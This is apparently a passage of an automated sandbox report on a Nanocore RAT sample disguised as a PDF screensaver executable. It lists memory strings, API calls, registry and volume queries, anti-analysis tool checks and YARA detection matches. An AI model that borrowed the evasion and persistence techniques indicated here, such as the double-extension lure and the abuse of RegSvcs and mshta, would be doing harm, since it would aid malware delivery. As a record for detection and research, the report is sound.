      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.cmd"720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c32bf4bb517f770c.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c]
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247cl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb1cd5876247531994bcce137cbe4f905f4178f006
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ez
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd23e39753777f38a797eb0855807ea04f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247crentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = wscript.createobject(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: persistence-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600cs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exests
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770cf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d617
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdirte
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regsvcs.exest
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: delay
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutexc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exese
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c717\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbsb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _msgbox
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k3ysx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tla&t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0xct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @7xdt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @phct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m8ct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wxct
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0EBE5 mouse_event,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerg
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: ihgsvw.exeBinary or memory string: Shell_TrayWnd
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@K
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\2+
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
      Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inGetText("Program Manager") = "0" Then
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: GetLocaleInfoW,GetNumberFormatW,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF654 cpuid
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BFE5F8 GetUserNameW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DB146 GetVersionExW,
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
